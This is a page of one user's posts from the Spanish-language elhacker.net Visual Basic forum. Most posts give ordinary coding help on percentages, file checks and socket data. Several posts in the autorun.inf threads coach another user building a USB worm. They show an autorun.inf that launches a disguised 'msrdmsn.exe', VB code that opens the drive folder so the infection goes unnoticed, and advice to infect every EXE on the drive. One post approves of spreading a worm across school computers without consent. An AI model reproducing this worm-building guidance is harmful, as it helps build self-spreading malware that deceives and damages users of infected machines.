elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 [306] 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 ... 331
3051  Programación / Programación Visual Basic / Re: Radio en VB? en: 22 Mayo 2009, 05:12 am
mmm eso es algodificil:

Ya que tendrias que estar teniendo un oroceso que le haga un resample a la cancion es decir bajar sus kbs de reproduccion y q los apase aenvia masivo, teniedno obviamente unos 60 min aproximadamente de bufer, para posteriormente enviarlos

En si s algo asi como stremingcomo youtube (flash nomaneja strimg en inea directa solo archivos estaticos.) pero en linea activa. mas la suma de la compresion del envio en paquetes xS.
3052  Programación / Programación Visual Basic / Re: duda con calculos en vb y porcentaje en: 18 Mayo 2009, 23:53 pm
no hay fallo en el trozo que plasme en si lo que hice fue tomar en consideración de 0 a X siendo 0 = 0% y X = 100% jamas tome diferencial alguno

graficamente hablando tome como referencia el Numero mayor como 100% y el numero cero como 0% entonces


0------------------18
0------------------------------------------------------------100

= 18% casi igual y de diferencia solo se restaria ese 18% el 100% que seria 82% pero da igual no es lo que pedias...!¡


A=19
B=1

1= 5% de 19 por ende es 5% igual de 19 y 95% diferente

P.D.: creo que deberias tranajar con regla de 3 en lugar de siempre esperar un numero menor a 100,

Si el la diferencia de A y B = 100 dice que es un numero grande?...¡!

Saludos, Dulces Lunas
3053  Programación / Programación Visual Basic / Re: duda con calculos en vb y porcentaje en: 18 Mayo 2009, 23:10 pm
NO SE SI LE ATINE O NO PERO AUN ASI TE DIGO LO QUE TE ENTIENDO

supongamos que se genero un numero en "X" y uno "Y"

rectifico cual es el mayor y con base a esto lo mando a una funcion donde el mayor el es 100% y el menor es una parte de ese porcentaje

es decir

A=19
B=50

por decir algo

Código
  1. Private Sub Form_Load()
  2. 'juega con estos valores
  3. a = 50
  4. b = 49
  5. 'Fin valores
  6. If a > b Then
  7. res = Porcentaje(a, b)
  8. ElseIf b > a Then
  9. res = Porcentaje(b, a)
  10. Else
  11. res = 100
  12. End If
  13. MsgBox res
  14. End Sub
  15. Function Porcentaje(ByVal ValMax As Integer, ByVal valMin As Integer) As Long
  16.     Porcentaje = (valMin * 100) / ValMax
  17. End Function
  18.  


Edito-------------------------


Código
  1. Option Explicit
  2. Private Sub Form_Load()
  3. Dim a As Integer
  4. Dim b As Integer
  5. Dim res As String
  6. a = 19
  7. b = 50
  8. res = IIf(a > b, Porcentaje(a, b), IIf(b > a, Porcentaje(b, a), 100))
  9. MsgBox res
  10. End Sub
  11. Function Porcentaje(ByVal ValMax As Integer, ByVal valMin As Integer) As Long
  12.     Porcentaje = (valMin * 100) / ValMax
  13. End Function
  14.  
3054  Programación / Programación Visual Basic / Re: Error al copiar archivo (file not found) en: 15 Mayo 2009, 21:33 pm
a si si quieres alojar una rchivo en una variable usa

Código
  1. Open Ruta for binary as 1
  2.     get 1,,Variable
  3. close 1
  4. 'Procesos deseados
  5.  

Lo que tu haces es solo almacenar la ruta del archivo.

Saludos, Dulces Lunas
3055  Programación / Programación Visual Basic / Re: Error al copiar archivo (file not found) en: 15 Mayo 2009, 21:23 pm

PAra verificar si existe un Directorio, Archivo o no se yo lo que desees usa:
Código
  1. if dir(RutaEXE/Directorio,tipo) then
  2.     'Si Existe
  3. else
  4.     'No Existe
  5. end if
  6.  

Este solo corrige el directorio residente del archivo para posteriormente concatenar solamente el nombre/extensión
Código
  1. If Right(dioxis, 1) <> "\" Then dioxis = dioxis & "\"
  2. dioxis = dioxis & App.EXEName & ".exe"
  3.  

Saludos, Dulces Lunas
3056  Programación / Programación Visual Basic / Re: autorun.inf arruina el USB :( en: 15 Mayo 2009, 21:08 pm
De verdad esas mierdas joden a gente que usa eso para trabajar como a mi madre
que le entro una p**a ***** de esas.. odio.. rotundamente odio a la gente que usa estos codigos para usarlos maliciosamente.. quizas no seas vos el caso que lo use para mal sino para aprender pero de verdad odio y mataria a la gente que lo usa para hacer mal o simplemente molestar... Para que lo hacen? tienen alguna carencia familiar? Son de naturaleza maldosa?...
Porque la gente no les hace nada para que hagan esa *****!!!!
De verdad no pierdan el tiempo haciendo eso...
Yo lo mas malo que he echo es un espiador de WebCam pero nunca, nunca lo saque a la luz ni siquiera done el Source como Hizo el de MSN Kiker que se hizo un escandalo tremendo cuando llego a las manos de los niñatos >:(...

Por eso si lo haces para aprender te doy todo mi apollo.. si quieres usarlo para mal o molestar te deseo todo lo peor >:(...
Porque gente como mi madre que usan eso para trabajar, llevar facturas en ellos y todo eso no tienen la culpa de carencias mentales de la gente que hacen esos virus para la finalidad que le quieran dar >:(

Salu2

Ranslsad

Un gusano no siempre es Maligno en ocasiones beneficia al usuario en seguridad, solo es considerado gusano a aquel soft que se difunde de forma oculta y sin permiso el usuario (aun que esto en cierta forma es malo).

De igual forma puede usarse para diversas formas un gusano, por ejemplo yo en mi escuela use un gusano que se difundio exitosamente en todas las Computadoras, OJO no era malicioso lo unico que difundio fue un Desabilitador de Autorun.Inf (PAra evitar autoejecucion del Autorun.inf de USB, CD/DVD y/o HD), y a su vez un Switch de USB (algo asi como Permitir/Denegar escritura en un disco flexible pero en USB.), que solo funcionaba en un cierto grupo de trabajo de PC para evitar la dispercion masiva y ser considerado. Era algo estrepitoso pero factible ya que como mi usb a cada rato se me infectaba y se me jodian mis EXE (que lo cual era reversible ante la infeccion).
3057  Programación / Programación Visual Basic / Re: Problemas con dataarrival en: 15 Mayo 2009, 21:00 pm
ok, gracias, voy a averiguar el porque

hare lo que me has dicho blackzero+ lo imprimire de forma local en un textbox, luego de manera remota y despues si funciona bien, lo pasare a el control correspondiente, haber si me funciona

sino debere pasar los path de directorios y ficheros del cliente a otro formato para poder enviarlos ya que me han dicho que los drivelist, dirlist y filelist no se pueden enviar

es eso verdad?

sus items si se pueden enviar

es como si manejaras un listbox o listview por decir algunos arecido

En este caso es practicamente lo mismo, realizas un bucle que pase TODOS los items de estos elementos a una variable tipo String (con su separacion entre cada uno de estos, ojo con eso) y ya posteriormente envias los datos, revisa la documentación de esos controles.

De igual forma puedes quitar esas dependencias feas con codigo y alivianar dicho Programa, en ete foro ya estan dichos codigos solo hay que buscarlos

Saludos, Dulces Lunas
3058  Programación / Programación Visual Basic / Re: autorun.inf arruina el USB :( en: 15 Mayo 2009, 04:48 am
yo hice algo parecido con c pero como ahi no hay el App.Path... es algo sencillo pero cuando lo haces por primera vez... es otra historia. Pero imaginense como se hari aen ensamblador  :P, que rompedura de cabeza ...

Citar
igual puedes usar:

Código:

shell\explore\Command=TuEXE
Código:

y de igual forma en las demas opciones solo debes aprender a leer el regitro de windows, para saber identificar estas lineas...¡!


el problema con esto es que no funciona en vista, bueno lo otro si funciona pero te aparece el autorun de un cd cuando vas a instalar un programa

Solucion:

Infectar todo EXE en la USB para que estos actuen de forma de residente es decir:

Gusado & Separador & AplicacionOriginal

Lo demas es chacharra y media.

Saludos, Dulces Lunas.
3059  Programación / Programación Visual Basic / Re: autorun.inf arruina el USB :( en: 15 Mayo 2009, 04:40 am
Código:
validacion sencilla

[code=Vb]
if len(app.patch) =3 then
ShellExecute 0, "Open", App.Path, "", "", 1
end if
'Demas Procesos

otra cosa

yo no te dige esto peroigual puedes usar el autorun.inf:

Código:
shell\explore\Command=TuEXE

y de igual forma en las demas opciones solo debes aprender a leer el regitro de windows, para saber identificar estas lineas...¡!


P.D.: Ajala volviecen a poner el botoncito de borrar Post...¡!

Saludos Dulces Lunas.[/code]
3060  Programación / Programación Visual Basic / Re: autorun.inf arruina el USB :( en: 15 Mayo 2009, 04:26 am
Buenas ! y gracia spor el tiempo bueno mi problema es que estoy haciendo un gusanito el cual se esparce por medio de memorias USB FLASH ahora este es el codigo que uso en el autorun.inf:
[autorun]
open=msrdmsn.exe
UseAutoPlay = 1
action=@msrdmsn.exe
shell\open=Abrir
shell\open\Command=msrdmsn.exe
shell\open\Command=msrdmsn.exe

bueno la infeccion me funciona bien tengo una funcion que busca unidades y si encuentra una avilitada se copia en ese drive con el nombre "msrdmsn.exe" bueno la cosa es que cuando los archivos se copian al flash y el flash es retirado y depues introducido a otra maquina o ala misma cuando entro a MI PC y hago doble Click Perfecto el autorun funciona y mi archivo se ejecuta (msrdmsn.exe)  pero es imposible acceder por medio de Mi Pc a las carpetas que estan adentro del flash la unica manera es ir Inicio-accesorios-explorar de windows desde ahi si,,,,,,, pero yo quisiera que el usuario al hacer doble click en la unidad del Flash de MIPC mi archivo se ejecute pero tambien el usuario pueda entrar a explorar sus carpetas y documentos ,espero dejarme a entender ?¿ hehe ssaludos y hasta luego !!!

agrega este codigo a tu gusano al inicio habitualmente yo uso siempre el proceso sub main


Código
  1. Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  2. Sub main()
  3. ShellExecute 0, "Open", App.Path, "", "", 1
  4. 'Aca  ahora si ejecutamos los demas procesos como carga de formualrios y demas
  5. End Sub
  6.  

ojo use App.Patch para ejecutar el directorio actual, en tu caso en el directorio raiz cual es que se pide.

Para que cuando se autoejecute, por si mismo ya sea por medio de registro, por carpeta inicio, o cualquier otro medio no aparezca la carpeta que contenga el exe por ejemplo "c:\windows\system32" por decir algo hayq ue validar el directorio contenedor del gusano.

P.D.: Me parece que abre una ventana nueva jom xP, pero algo es algo aun en penumbra/indolora.

Saludos Dulces Lunas.
Páginas: 1 ... 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 [306] 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 ... 331
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines